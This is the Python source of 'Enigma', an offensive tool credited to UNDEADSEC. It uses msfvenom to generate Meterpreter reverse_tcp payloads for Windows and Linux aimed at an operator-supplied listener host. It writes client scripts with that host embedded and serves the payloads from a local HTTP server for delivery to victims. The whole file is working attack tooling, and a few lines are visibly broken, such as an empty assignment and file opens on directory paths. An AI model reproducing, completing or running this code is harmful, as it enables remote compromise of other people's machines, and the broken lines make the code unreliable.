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- #-*- coding: utf-8 -*-
- #------------------------------------------------------
- #
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- #------------------------------------------------------
- from subprocess import call
- from time import sleep
- from os import geteuid
- from sys import exit
- if not geteuid() == 0:
- exit('Enigma must be run as root')
- RED, WHITE, YELLOW, CIANO, GREEN, END = '\033[91m', '\33[46m', '\33[93m', '\33[36m', '\033[1;32m', '\033[0m'
- def message():
- call('clear', shell=True)
- print '''
- {1}:::::::::: :::: ::: ::::::::::: :::::::: :::: :::: :::
- :+: :+:+: :+: :+: :+: :+: +:+:+: :+:+:+ :+: :+:
- +:+ :+:+:+ +:+ +:+ +:+ +:+ +:+:+ +:+ +:+ +:+
- +#++:++# +#+ +:+ +#+ +#+ :#: +#+ +:+ +#+ +#++:++#++: {0}
- +#+ +#+ +#+#+# +#+ +#+ +#+# +#+ +#+ +#+ +#+
- #+# #+# #+#+# #+# #+# #+# #+# #+# #+# #+#
- ########## ### #### ########### ######## ### ### ### ###
- by: UNDEADSEC from BRazil'''.format(CIANO, END)
- def runServer():
- print '\n {0}[{1}*{0}]{1} Starting Server... {2}H4ppy h4ck1ng {1}:)'.format(CIANO, END, GREEN)
- sleep(3)
- call('cd Server && python -m SimpleHTTPServer 80', shell=True)
- def generatePayloads():
- call('rm -Rf Server/x64/* && rm -Rf Server/x86/*', shell=True)
- payloadLHOST= raw_input('\n {0}[{1}~{0}]{1} Insert your payload LHOST: '.format(CIANO, END))
- payloadLPORT= raw_input('\n {0}[{1}~{0}]{1} Insert your payload LPORT: '.format(CIANO, END))
- print '\n {0}[{1}~{0}]{1} Generating Payloads...'.format(CIANO, END)
- call('msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=' + payloadLHOST + ' LPORT=' + payloadLPORT + ' -f elf -o Server/x64/lin.elf', shell=True)
- call('msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=' + payloadLHOST + ' LPORT=' + payloadLPORT + ' -f elf -o Server/x86/lin.elf', shell=True)
- call('msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=' + payloadLHOST + ' LPORT=' + payloadLPORT + ' -f exe -o Server/x64/win.exe', shell=True)
- call('msfvenom -p windows/meterpreter/reverse_tcp LHOST=' + payloadLHOST + ' LPORT=' + payloadLPORT + ' -f exe -o Server/x86/win.exe', shell=True)
- def generateClient():
- lhost= raw_input('\n {0}[{1}~{0}]{1} Insert your LHOST: '.format(CIANO, END))
- template = open('Clients/', 'r')
- template =
- new = open('Output/', 'w')
- new.write('#!/usr/bin/python\n# -*- coding: utf-8 -*-\nhost = \'' + lhost + '\'\n')
- new.write(template)
- print '\n {0}[{1}~{0}]{1} Generating Clients...'.format(CIANO, END)
- sleep(3)
- print '\n {0}[{1}*{0}]{1} Process done.\n\n {2}[{1}*{2}] Clients saved to Output/{1}'.format(CIANO, END, GREEN)
- def init():
- call('rm -Rf Server/x64/* && rm -Rf Server/x86/*', shell=True)
- print '\n {0}[{1}~{0}]{1} Arranging the house...'.format(CIANO, END)
- sleep(3)
- call('cp ' + win64 + ' Server/x64/win.exe', shell=True)
- call('cp ' + win86 + ' Server/x86/win.exe', shell=True)
- call('cp ' + lin64 + ' Server/x64/lin.elf', shell=True)
- call('cp ' + lin86 + ' Server/x86/lin.elf', shell=True)
- print '\n {0}[{1}*{0}]{1} Process done.'.format(CIANO, END)
- def main():
- global win64, win86, lin64, lin86, mac64, mac86
- print ' Select an option:\n\n {0}[{1}1{0}]{1} Insert your custom payloads -> Recommended\n\n {0}[{1}2{0}]{1} Generate payloads with metasploit'.format(CIANO, END)
- ask = raw_input('\n{0} EN1GM4 {1}> '.format(CIANO, END))
- if ask == '1':
- win64 = raw_input('\n {0}[{1}1{0}/{1}4{0}]{1} Insert Windows Payload x64 file path: '.format(CIANO, END))
- win86 = raw_input('\n {0}[{1}2{0}/{1}4{0}]{1} Insert Windows Payload x86 file path: '.format(CIANO, END))
- lin64 = raw_input('\n {0}[{1}3{0}/{1}4{0}]{1} Insert Linux Payload x64 file path: '.format(CIANO, END))
- lin86 = raw_input('\n {0}[{1}4{0}/{1}4{0}]{1} Insert Linux Payload x86 file path: '.format(CIANO, END))
- init()
- if ask == '2':
- generatePayloads()
- generateClient()
- runServer()
- message()
- main()
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